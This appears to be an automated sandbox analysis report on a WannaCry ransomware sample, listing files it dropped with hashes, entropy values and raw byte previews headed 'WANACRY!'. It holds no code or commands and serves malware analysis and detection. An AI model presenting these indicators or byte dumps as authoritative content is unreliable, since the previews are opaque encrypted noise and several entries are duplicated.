                                                                                      Preview:WANACRY!......6......&/K.F........mKk.......x..~?~.!...d.M...xiCB;z...?..hy.dq_C1CA.n*.y....jFqP.T"....Q..M.[..rTI...6..........:.g.....F.w...ze..Ss..n.<.{...f,.r.T.....C.CNi.W....A......{S6....$i.........>Y.wO.`t.s|.V.Y+:.......pElu.(..;C....C..zMn\).]...n..,6....m..........L..s...]..A....<K......Q.].zz...%n1.#.....z....w,x9\..C...l..~.{....D...!.k.B%*....f.7. ..K......s2.vR...>?...urR@.3..VA..i.O....S....Y.M...Py..D8....T.y8.g.....y]_..Y.e.T3..Q.}...};.......q.K.g..kv..e......Y.......L....QV.j..$..`a<.E.9..|.....(.{.U5....n.q'.....\..........b.."...ng..vfjk.T.........:....0.....-.I...s....R..._x.... ...pL|.y.I.,R.....pO.<.'..h._.N6...4H..J.PG.s........ ..Uq..g.DrCt.P..ne&....BN....)I}...4z=..F{....Vi...].B)N..'.#FB5....vjDB.?/[.3.J..+z....!.g..S&../U..#q<.....:......[.TS.XB...;Q..o......?...=?..U4.....6G...5..!.j|...._..0.<h@.Q.w9aT*@T+.......,....c...%;r.r9G...ROk......,..$.f..Sy..Z!...X.vFw....H[..&...)Yx\...p6....*...yf.R..o......7hi.<!..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2696
                                                                                      Entropy (8bit):7.932345232932748
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bkw7U2aBUOWMSJ9RcuZupFWzux9fybbY4FTTx2d0t2dWRpGnPibkufEAE/KzgFt:o0U3UOuvRcuZQWyx1yb9TTsZnqbfQL
                                                                                      MD5:9F5E8F74F3A9088711205286FD6DEE5E
                                                                                      SHA1:44B6F9B24D2DF2C3D3B15D21ABB5E9D0BC7C62FB
                                                                                      SHA-256:65F81970B199244932394FA5D2FD1135CA3C4C74A00D32BBE143CC8DD9948F3B
                                                                                      SHA-512:FBCFC5CE36AD8CB16A62FC266906827DA2ACFF6FB85E8AADD3DEE10E6253DBE9165C88E5EECE3F5F1A69994B9813F6858CB520974586F8747DA99834E89B0BCD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......6......&/K.F........mKk.......x..~?~.!...d.M...xiCB;z...?..hy.dq_C1CA.n*.y....jFqP.T"....Q..M.[..rTI...6..........:.g.....F.w...ze..Ss..n.<.{...f,.r.T.....C.CNi.W....A......{S6....$i.........>Y.wO.`t.s|.V.Y+:.......pElu.(..;C....C..zMn\).]...n..,6....m..........L..s...]..A....<K......Q.].zz...%n1.#.....z....w,x9\..C...l..~.{....D...!.k.B%*....f.7. ..K......s2.vR...>?...urR@.3..VA..i.O....S....Y.M...Py..D8....T.y8.g.....y]_..Y.e.T3..Q.}...};.......q.K.g..kv..e......Y.......L....QV.j..$..`a<.E.9..|.....(.{.U5....n.q'.....\..........b.."...ng..vfjk.T.........:....0.....-.I...s....R..._x.... ...pL|.y.I.,R.....pO.<.'..h._.N6...4H..J.PG.s........ ..Uq..g.DrCt.P..ne&....BN....)I}...4z=..F{....Vi...].B)N..'.#FB5....vjDB.?/[.3.J..+z....!.g..S&../U..#q<.....:......[.TS.XB...;Q..o......?...=?..U4.....6G...5..!.j|...._..0.<h@.Q.w9aT*@T+.......,....c...%;r.r9G...ROk......,..$.f..Sy..Z!...X.vFw....H[..&...)Yx\...p6....*...yf.R..o......7hi.<!..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4072
                                                                                      Entropy (8bit):7.955396078334635
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oG2aM2jl3N0CM7JEk2uCpzP8h/jwMfZhCvnf3O0Ljp0:we3N+yVu2YlbvmpLm
                                                                                      MD5:1914F5E697E68FD74FBDFEA3828208BF
                                                                                      SHA1:D5A84CAF82EF97FABFA8EC1F5471142D8B424031
                                                                                      SHA-256:C14CF28319783A6DEC4E36C6A14F9F3DC7F615FFBB7E215B576AFB256B9D3488
                                                                                      SHA-512:A2F2CCDA3BEB897EB918F68060FA3EE80DC477850F2151CCAD0B7849E2C7972117A274DD5E626ED7A31542686606BDB3E622547593B5D33247203A6B8761F6E7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....zv....b0..f. MW..D...e.0.}T../.12x.)\...g;."G...!-.Y.mQXD.$.Y...!v.{.......g...&.B...~;...3.d...NC.EM.C=......v.'.....(.^C......@......uqz..X.=.~...{7.T.q...z......kZ.]dB..7.<O..a*..jC..lB].]y..2......y....K....Y..I..Q.T...$_.....)e..<...............<.A..1.._o.TO#}..!.]..A..|.......(..!V:EY...I..v~.M.q......O.....F.!#......S.R.X..S......>.*...........dJ..f.R.._...~....<.CqL.e~*.`..k[..U.?~...)Y..:....../..~gF ....9....#J...IR..v.![q1.u}........X.H.....>A..l..,o....,..&+..J..q...w............%..+...3.B...v5./,.......\9.Q:.2....^.8&..D.#.i...D........X.0..J|.......~...4r~.b.6+.J..'e.O.:>.Tsyg;....S6...Pk#J..-..J...6..A..L}6.@.g?...yk.:..D...vl..<xk...).g...W.u.2.^.a.y,...N.z..TF.t..|.&.rI...p.r......./. e.U.....@#I..1[#....).}.D\z..?.......T~T.M)....=...`..b..AN...c/....=..TP2...^..i:...l~.3'..!._z...K...0....0.9......Ke...B..w..46MB...{.7..Zs.rT$P..V..4......U....T.N.D=.w......2..WGA:..y.TI..!l....n...!..Y..^..I...2.i
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4072
                                                                                      Entropy (8bit):7.955396078334635
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:oG2aM2jl3N0CM7JEk2uCpzP8h/jwMfZhCvnf3O0Ljp0:we3N+yVu2YlbvmpLm
                                                                                      MD5:1914F5E697E68FD74FBDFEA3828208BF
                                                                                      SHA1:D5A84CAF82EF97FABFA8EC1F5471142D8B424031
                                                                                      SHA-256:C14CF28319783A6DEC4E36C6A14F9F3DC7F615FFBB7E215B576AFB256B9D3488
                                                                                      SHA-512:A2F2CCDA3BEB897EB918F68060FA3EE80DC477850F2151CCAD0B7849E2C7972117A274DD5E626ED7A31542686606BDB3E622547593B5D33247203A6B8761F6E7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....zv....b0..f. MW..D...e.0.}T../.12x.)\...g;."G...!-.Y.mQXD.$.Y...!v.{.......g...&.B...~;...3.d...NC.EM.C=......v.'.....(.^C......@......uqz..X.=.~...{7.T.q...z......kZ.]dB..7.<O..a*..jC..lB].]y..2......y....K....Y..I..Q.T...$_.....)e..<...............<.A..1.._o.TO#}..!.]..A..|.......(..!V:EY...I..v~.M.q......O.....F.!#......S.R.X..S......>.*...........dJ..f.R.._...~....<.CqL.e~*.`..k[..U.?~...)Y..:....../..~gF ....9....#J...IR..v.![q1.u}........X.H.....>A..l..,o....,..&+..J..q...w............%..+...3.B...v5./,.......\9.Q:.2....^.8&..D.#.i...D........X.0..J|.......~...4r~.b.6+.J..'e.O.:>.Tsyg;....S6...Pk#J..-..J...6..A..L}6.@.g?...yk.:..D...vl..<xk...).g...W.u.2.^.a.y,...N.z..TF.t..|.&.rI...p.r......./. e.U.....@#I..1[#....).}.D\z..?.......T~T.M)....=...`..b..AN...c/....=..TP2...^..i:...l~.3'..!._z...K...0....0.9......Ke...B..w..46MB...{.7..Zs.rT$P..V..4......U....T.N.D=.w......2..WGA:..y.TI..!l....n...!..Y..^..I...2.i
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7000
                                                                                      Entropy (8bit):7.968177900130342
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:eOFMRxOwiCixSX+Nc99Qr8+rwxIDVkuFJqs6Rn:eOeSwPixSX+NcvU86VtFJ8
                                                                                      MD5:5E0338E8124499B3A414B1DD1DA50062
                                                                                      SHA1:47A798AA0F05179ADCCA0434C54B08486D9C30EE
                                                                                      SHA-256:21477122B9849CC3286F6A7E807539C4B622EABF4F8593655A6A309DC08E1FE6
                                                                                      SHA-512:2FBDEA0A6B6D7939719985561BD8EEC0FD2673DEFDFCAE5A7C7F7242316B2532A130917CAA19E49E2846CD4BC35B1A96779E5AE1AD72641D4753A315C218E15C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....I..{....m.#.B{j..?.M..`..?n6/..\f7..\.W......M.]...A.x....3...i...P.E..&..[.....?..f=wI3R.c[.',..1.#.4.....;E..$)N.a.....Y1;.pw."y.m.)'.....)1!.5.Se...kG..*.1...U......2......Q2E..].+....#....r..y..x./...0.p>]Tp.... .....9...x....W....WYU.....;.......O...s.J..$..8.Q...~:...a..8.ww.l.b...mt=.&*.u..<.vMG:.......U..x:l.......2...j....!.+.D..-.k...F...E..u.l(...w.}O..W.....H.t?e~)V/i.Fb.Xi....Z...v....9......3#.2.K.'*.@.I..VO..?,A-.......3.*..].L...?xOQG.e=...By....`.B.G.p....5<....AC(.....Z:..r.C*>.iVLc../L.<-....Dp.j..@G....0..9<.'..ihF...&.............[V....}j.)...cGO6.%w.<...W&X.~p.3..V..r~v..u!........1".j......3..>@J..f..I.b!..{.Q..+.'..z...M..2+.g..pp*9k8iX.m[....Z.n.....E.......n..B.....d.+|.6R.+.....%L.Y.>ch.d0t..c....v@.{....t...vi..5.Fc@B@..x..X.S..Di......Y*.#K.F....+`...i%.g...+..r..+fq..8.Ejy..........!G...D.i%/..M.F..Yi.3<...Y...N.......w....%VB...k+Oc`..5xR..#vj.....#...gsA.GW.....c...]iO|"...2..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):7000
                                                                                      Entropy (8bit):7.968177900130342
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:eOFMRxOwiCixSX+Nc99Qr8+rwxIDVkuFJqs6Rn:eOeSwPixSX+NcvU86VtFJ8
                                                                                      MD5:5E0338E8124499B3A414B1DD1DA50062
                                                                                      SHA1:47A798AA0F05179ADCCA0434C54B08486D9C30EE
                                                                                      SHA-256:21477122B9849CC3286F6A7E807539C4B622EABF4F8593655A6A309DC08E1FE6
                                                                                      SHA-512:2FBDEA0A6B6D7939719985561BD8EEC0FD2673DEFDFCAE5A7C7F7242316B2532A130917CAA19E49E2846CD4BC35B1A96779E5AE1AD72641D4753A315C218E15C
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....I..{....m.#.B{j..?.M..`..?n6/..\f7..\.W......M.]...A.x....3...i...P.E..&..[.....?..f=wI3R.c[.',..1.#.4.....;E..$)N.a.....Y1;.pw."y.m.)'.....)1!.5.Se...kG..*.1...U......2......Q2E..].+....#....r..y..x./...0.p>]Tp.... .....9...x....W....WYU.....;.......O...s.J..$..8.Q...~:...a..8.ww.l.b...mt=.&*.u..<.vMG:.......U..x:l.......2...j....!.+.D..-.k...F...E..u.l(...w.}O..W.....H.t?e~)V/i.Fb.Xi....Z...v....9......3#.2.K.'*.@.I..VO..?,A-.......3.*..].L...?xOQG.e=...By....`.B.G.p....5<....AC(.....Z:..r.C*>.iVLc../L.<-....Dp.j..@G....0..9<.'..ihF...&.............[V....}j.)...cGO6.%w.<...W&X.~p.3..V..r~v..u!........1".j......3..>@J..f..I.b!..{.Q..+.'..z...M..2+.g..pp*9k8iX.m[....Z.n.....E.......n..B.....d.+|.6R.+.....%L.Y.>ch.d0t..c....v@.{....t...vi..5.Fc@B@..x..X.S..Di......Y*.#K.F....+`...i%.g...+..r..+fq..8.Ejy..........!G...D.i%/..M.F..Yi.3<...Y...N.......w....%VB...k+Oc`..5xR..#vj.....#...gsA.GW.....c...]iO|"...2..
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2600
                                                                                      Entropy (8bit):7.924172502246626
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk8kRtW8y/8awD2tFh56O7ZbqMCYhwP7CJK8MqGBalDnmOO8jnqxrricS:otyOuh5L7IMCYhwP7CjsWTBuxrrdS
                                                                                      MD5:45B6450729430E5B140F7DA1D7CCEB20
                                                                                      SHA1:3773F86F56846D06AF721781025FFCD5FC6E4924
                                                                                      SHA-256:01182654B1AB9529D31710C1325F9AD1948CD5999FB543AAC4B9694CCC8789A7
                                                                                      SHA-512:2B225C96CD66A2496B2C5455CE8C295E996C8A20D6CC7C371EE84518EE778B34FAA7BF5640D9B6447F4002782723A1F049E0138FFB5FD4129AE25D33A0BAC615
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Q..mh.J...y.P{k.R.V1..`.P.....'...'.EZ.h...|.S.995Rx...,.\.2!-...L/Z{Z....".-3.........2....>g0.O.<*...9+...*...b.62u..Y[.G....d6.C.9.l.F\...S.".j.....2........+....V...C.r/.cqk-.<%.......y......t.uJ.,.,.^4~...zCv)...v.`.i..KA3).J[....a(..O...............k...o.&....P-..J..]NGZ.....\.]......:L.r..x....[...?.......s...P.....Y!>>..*..!.....3e .]..&.=.f..;.%X.[VD..VF...Aq. W.......)..m..1......w*S....i..Nw6=a.........`....]I..Q:.....3".ew..8. w.lq.I....1.w...k..ht.@...D..1......."..i....j........9...\7H.g..-.8.f%"..*.U...gE....+ ...."...........6. .z>-sW5..?......NX.LyX.........i.za'Y.9.=t.?o=.Y!GHB9T..U.J.t.....dN.`.:...{.U..m....."../U.....[..f?...p...6.sm....o..v.!.L.N.1/H%..O.......(E..a...>a.. $......W{..n......Z....).lD!.....k..p8.X...#..F...I.|..i....n.q..d.n.f.1]!.\......|..='....*..........8....;-yl.+..T7......f.S*.b.^X...~.....@n..?T...].J............xC_....FY....:.......'.q..^.t.*H..k.^....j@.Pr#,.Lxa8.o<LL.k.a.\5
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):2600
                                                                                      Entropy (8bit):7.924172502246626
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk8kRtW8y/8awD2tFh56O7ZbqMCYhwP7CJK8MqGBalDnmOO8jnqxrricS:otyOuh5L7IMCYhwP7CjsWTBuxrrdS
                                                                                      MD5:45B6450729430E5B140F7DA1D7CCEB20
                                                                                      SHA1:3773F86F56846D06AF721781025FFCD5FC6E4924
                                                                                      SHA-256:01182654B1AB9529D31710C1325F9AD1948CD5999FB543AAC4B9694CCC8789A7
                                                                                      SHA-512:2B225C96CD66A2496B2C5455CE8C295E996C8A20D6CC7C371EE84518EE778B34FAA7BF5640D9B6447F4002782723A1F049E0138FFB5FD4129AE25D33A0BAC615
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......Q..mh.J...y.P{k.R.V1..`.P.....'...'.EZ.h...|.S.995Rx...,.\.2!-...L/Z{Z....".-3.........2....>g0.O.<*...9+...*...b.62u..Y[.G....d6.C.9.l.F\...S.".j.....2........+....V...C.r/.cqk-.<%.......y......t.uJ.,.,.^4~...zCv)...v.`.i..KA3).J[....a(..O...............k...o.&....P-..J..]NGZ.....\.]......:L.r..x....[...?.......s...P.....Y!>>..*..!.....3e .]..&.=.f..;.%X.[VD..VF...Aq. W.......)..m..1......w*S....i..Nw6=a.........`....]I..Q:.....3".ew..8. w.lq.I....1.w...k..ht.@...D..1......."..i....j........9...\7H.g..-.8.f%"..*.U...gE....+ ...."...........6. .z>-sW5..?......NX.LyX.........i.za'Y.9.=t.?o=.Y!GHB9T..U.J.t.....dN.`.:...{.U..m....."../U.....[..f?...p...6.sm....o..v.!.L.N.1/H%..O.......(E..a...>a.. $......W{..n......Z....).lD!.....k..p8.X...#..F...I.|..i....n.q..d.n.f.1]!.\......|..='....*..........8....;-yl.+..T7......f.S*.b.^X...~.....@n..?T...].J............xC_....FY....:.......'.q..^.t.*H..k.^....j@.Pr#,.Lxa8.o<LL.k.a.\5
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1576
                                                                                      Entropy (8bit):7.884602108200695
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk7HiNgeJDWSQXRGW4p1Kygk7m4Q+cHK1n:o7HiNPySQhGW4pAtnVW
                                                                                      MD5:75BC672914E38C0495A4D723DFFF0529
                                                                                      SHA1:85258EBDD9B5A166179A2B6771B38098AC00742D
                                                                                      SHA-256:B2C3ABAEA47AB3FF75FCF14F37E2461903AFC3018D1A76F8DB8C1D7960DEF07B
                                                                                      SHA-512:07689A8F57F6B103E521161CA60A985383F26CA74CFCD9D3A82B8959C34D67BEF3B79FF31B3319F0FDBD38F2C42367A78667F4CC06531C8CC34CCA533C15F6B6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......,-5..,/.I.'..A.4.0.j.^G%v.~f...{.'.Bi. .........c...L3)...A..i.V...i.p.j......V..m~.\wO.p~.sK.......#]..p.....'iYP....8.cE..".k1..4..';.!/x..\}.P.Z.P0f.....}.E..gB..J..a....q...Wn]L2Y....k.?TLeEh.<..M6.0..A.vPY......{....$=.......%.57..`.].y..............[S..1x|..i.....&....-.9..93$..%....6Z)4n...a..Y..... Az....4.&4...U8.....w.........XUo.:ya..[....~.S...'|...0.P..P.{.hr.......a..Q?.....G...B..n.od6......C.tt..y.....hR%..z*..TI...?o.'C...~.h....@.....o.#...I.. ..)+.......+...>c..q.Odf.....p...N......W...Xj)....V.<C..@..3..=..o\...D..@.Q.N'.Rf)}.B...1..2.U...@..(......Q.[..Nx.am..ol..#.X9Q.a.%.2eO.....7.[2..eEiX..1.Z.,4)....a.H.4..Q..&J...^....w..J...........1._...D...6/{.4.l...n.......|......?i.4i...K...xh....VL........n..Q....,.(.......z...z.V..*.b.Sz.eXE.0..j.(T.O..<{..]G.!j.M."+.0....... ..?G.t!e=..'..#...Y`?...{.E....e8.f_.:.-1...Y.=.....nn..X../..|.E.'.e7.{.g[f.|.Y...:.fK...$h..6..B.a..a[j..B..[+....5..\..t.{...&.`.S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1576
                                                                                      Entropy (8bit):7.884602108200695
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bk7HiNgeJDWSQXRGW4p1Kygk7m4Q+cHK1n:o7HiNPySQhGW4pAtnVW
                                                                                      MD5:75BC672914E38C0495A4D723DFFF0529
                                                                                      SHA1:85258EBDD9B5A166179A2B6771B38098AC00742D
                                                                                      SHA-256:B2C3ABAEA47AB3FF75FCF14F37E2461903AFC3018D1A76F8DB8C1D7960DEF07B
                                                                                      SHA-512:07689A8F57F6B103E521161CA60A985383F26CA74CFCD9D3A82B8959C34D67BEF3B79FF31B3319F0FDBD38F2C42367A78667F4CC06531C8CC34CCA533C15F6B6
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......,-5..,/.I.'..A.4.0.j.^G%v.~f...{.'.Bi. .........c...L3)...A..i.V...i.p.j......V..m~.\wO.p~.sK.......#]..p.....'iYP....8.cE..".k1..4..';.!/x..\}.P.Z.P0f.....}.E..gB..J..a....q...Wn]L2Y....k.?TLeEh.<..M6.0..A.vPY......{....$=.......%.57..`.].y..............[S..1x|..i.....&....-.9..93$..%....6Z)4n...a..Y..... Az....4.&4...U8.....w.........XUo.:ya..[....~.S...'|...0.P..P.{.hr.......a..Q?.....G...B..n.od6......C.tt..y.....hR%..z*..TI...?o.'C...~.h....@.....o.#...I.. ..)+.......+...>c..q.Odf.....p...N......W...Xj)....V.<C..@..3..=..o\...D..@.Q.N'.Rf)}.B...1..2.U...@..(......Q.[..Nx.am..ol..#.X9Q.a.%.2eO.....7.[2..eEiX..1.Z.,4)....a.H.4..Q..&J...^....w..J...........1._...D...6/{.4.l...n.......|......?i.4i...K...xh....VL........n..Q....,.(.......z...z.V..*.b.Sz.eXE.0..j.(T.O..<{..]G.!j.M."+.0....... ..?G.t!e=..'..#...Y`?...{.E....e8.f_.:.-1...Y.=.....nn..X../..|.E.'.e7.{.g[f.|.Y...:.fK...$h..6..B.a..a[j..B..[+....5..\..t.{...&.`.S
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5480
                                                                                      Entropy (8bit):7.963881080473739
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ovC8/b3DRkiCz3yd7EsqlqFOOeqi/I2L3QswWJT9oruVGilyifU:OLXapz3yd7Evlq9Ti/DL3VwGKru1ffU
                                                                                      MD5:9F30C5EE88B9648FCB46A2961D91373F
                                                                                      SHA1:3B214CE88C969C6977B075ABBD8692AD23D04E63
                                                                                      SHA-256:B8E0564848B9E6A94A288071F07E88E3C397D896588CC922318C6F92A3DB15A2
                                                                                      SHA-512:A58BA9676362AA07DAB8FA5A51A96EBBE02685EE4AF43A0F4261D31FE155D1BCF0E65E07678F7F5A68944CAA028EBEF6A5D6254B1BC87A9300BD874D73874AA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....h...pNq.ty.#<....z....e.S.'|.K.$(.3.Y..Y ).....j.[.DB.K..3l.Cp.th.jo.]7.<....C.t'....."O..R..3YQ......t.4j....5T.8....".]T.wp.....c.t...VH.....&....BDc9..-....}..Rj.:.\>(..t....g..I....bZ.....K....k3.~s.e.....3.P..[..1.&i.q2..C%....i.Gt?Cf..3.J..t....G........k..(T.!/.<V./.#X...w..R.WI..ho...p...~...X..a.....:I.O........t..ff..T;..E.cRV... ..LH.....s.m6.]....];tn.........3.^?B.@K..C,..h}].....~.s.l.?...`..2d9y......c...^..E..?qv..*..k....Xt.FRp_\E.LLy)..g~....PU..o.-..t...]Zn..S..Y....>.d....[.)"..A...wi..x2.....W...Y:Cn..*....M.l.._......s..f-.l.-ze..1E~(....O..r.U${%D...Kz ..xp.......]j.M. .V.Y...#.-....-.A.5.j..$.P..U...x<....rhs.e...>Xs..A...J..Cp_.......O..^....r..%.... ..v..-....^&~....m..cs.h(.....s...q0NGbai.%....-.w.1.$b...t.2e.........Z.1.....f8.{.@..2.....`.......`..........z"<.J.|.... ].v#Q....I.&._\.wU.d...S....!.E..Y......q/...[t..3.A..9S..... E2....(.f..;F....]....%.<.t.."..Nd;kB....Ye..J.CCo..2.s....?n... .;.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):5480
                                                                                      Entropy (8bit):7.963881080473739
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:ovC8/b3DRkiCz3yd7EsqlqFOOeqi/I2L3QswWJT9oruVGilyifU:OLXapz3yd7Evlq9Ti/DL3VwGKru1ffU
                                                                                      MD5:9F30C5EE88B9648FCB46A2961D91373F
                                                                                      SHA1:3B214CE88C969C6977B075ABBD8692AD23D04E63
                                                                                      SHA-256:B8E0564848B9E6A94A288071F07E88E3C397D896588CC922318C6F92A3DB15A2
                                                                                      SHA-512:A58BA9676362AA07DAB8FA5A51A96EBBE02685EE4AF43A0F4261D31FE155D1BCF0E65E07678F7F5A68944CAA028EBEF6A5D6254B1BC87A9300BD874D73874AA3
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!....h...pNq.ty.#<....z....e.S.'|.K.$(.3.Y..Y ).....j.[.DB.K..3l.Cp.th.jo.]7.<....C.t'....."O..R..3YQ......t.4j....5T.8....".]T.wp.....c.t...VH.....&....BDc9..-....}..Rj.:.\>(..t....g..I....bZ.....K....k3.~s.e.....3.P..[..1.&i.q2..C%....i.Gt?Cf..3.J..t....G........k..(T.!/.<V./.#X...w..R.WI..ho...p...~...X..a.....:I.O........t..ff..T;..E.cRV... ..LH.....s.m6.]....];tn.........3.^?B.@K..C,..h}].....~.s.l.?...`..2d9y......c...^..E..?qv..*..k....Xt.FRp_\E.LLy)..g~....PU..o.-..t...]Zn..S..Y....>.d....[.)"..A...wi..x2.....W...Y:Cn..*....M.l.._......s..f-.l.-ze..1E~(....O..r.U${%D...Kz ..xp.......]j.M. .V.Y...#.-....-.A.5.j..$.P..U...x<....rhs.e...>Xs..A...J..Cp_.......O..^....r..%.... ..v..-....^&~....m..cs.h(.....s...q0NGbai.%....-.w.1.$b...t.2e.........Z.1.....f8.{.@..2.....`.......`..........z"<.J.|.... ].v#Q....I.&._\.wU.d...S....!.E..Y......q/...[t..3.A..9S..... E2....(.f..;F....]....%.<.t.."..Nd;kB....Ye..J.CCo..2.s....?n... .;.
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846788540018455
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkjozThw13yZjC/0TpoEOHOxU0+O2uh0FlfhuGHCvmVqG7ADp+k/Kxg+46b2kMlx:bkbyZ34Ox7+6CFlpiv3S2+kC545kBxor
                                                                                      MD5:BE4A37466CD9375D6A6E5D2FFFB4194E
                                                                                      SHA1:FB0F7F18AC990FBE6548DD9A71A877B88A3A0BC3
                                                                                      SHA-256:4E6A99CAF884CC53229F717174C33A578BC5BA11B5C456F785E69C3F0580A5F2
                                                                                      SHA-512:3D69C234B8828357DD36AB11A800973E48174CC01749D4EFADDCF8BCBF9A43689A0231DBD50F3E8D3CB4022FFCCA39DB8CE3E3A099F96F9B7B219C445E417855
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:WANACRY!......VG.Ek&H......P.{v5......../( .$.!G7(..........GW.......8p.......G... ....R:..4..A....h6,.+...7..B...J7.!.....P.d..:.j\aG2..E..K:..Ao..?|.P..^p.~.vHf.)(..Fx...Tbg.b]......g...,...G..|...j......K......II.|.;.>.w.m...-....a.n.8.&..;.=...x...............n...Zje#.f...T\.;..l0.D8.....!.ui....lq^E).\...&P....\2.0q....Y..+5.D&..U.\.Wdy...v.7.k..oT.j~....-.d..x9.P/...A.D.d..OC.....E.Ema.>V.*.=.L.:.m....DM..y#7.u..9b...c.....9.^...eRn/..z......g}.......=k.2.2.T.k.....Mw..=.1.0.F|{N...%&......$.CFR.c[7.....rl......Y"..e..,.....G.v:m.......8..o.....%.....n........W..%...c..%Y.Wg.]x......X...X...j...mz].....BH.........8....y...@s.)..<......>.*]s.C......0:a./.i5..*4...v...#..b.r.....!......P~P..8....W.R?2.....I.......|..i.$..y`.$Q+Y'.@S..#..QO]..&....$.....8..ny.Wyw3.j#....@{..../F".6L..M..H.I.~....^...!...&`..N...au.$z......^w.N[....2.S|U......c)..u03.....c/bH0.4.y.t..^.>...G..........>=.!....Q1...JO..c...Jt....%..WK1.[...!h.i
                                                                                      Process:C:\Users\user\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):1320
                                                                                      Entropy (8bit):7.846788540018455
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:bkjozThw13yZjC/0TpoEOHOxU0+O2uh0FlfhuGHCvmVqG7ADp+k/Kxg+46b2kMlx:bkbyZ34Ox7+6CFlpiv3S2+kC545kBxor
                                                                                      MD5:BE4A37466CD9375D6A6E5D2FFFB4194E
                                                                                      SHA1:FB0F7F18AC990FBE6548DD9A71A877B88A3A0BC3
                                                                                      SHA-256:4E6A99CAF884CC53229F717174C33A578BC5BA11B5C456F785E69C3F0580A5F2
                                                                                      SHA-512:3D69C234B8828357DD36AB11A800973E48174CC01749D4EFADDCF8BCBF9A43689A0231DBD50F3E8D3CB4022FFCCA39DB8CE3E3A099F96F9B7B219C445E417855
                                                                                      Malicious:false
                                                                                      Reputation:low
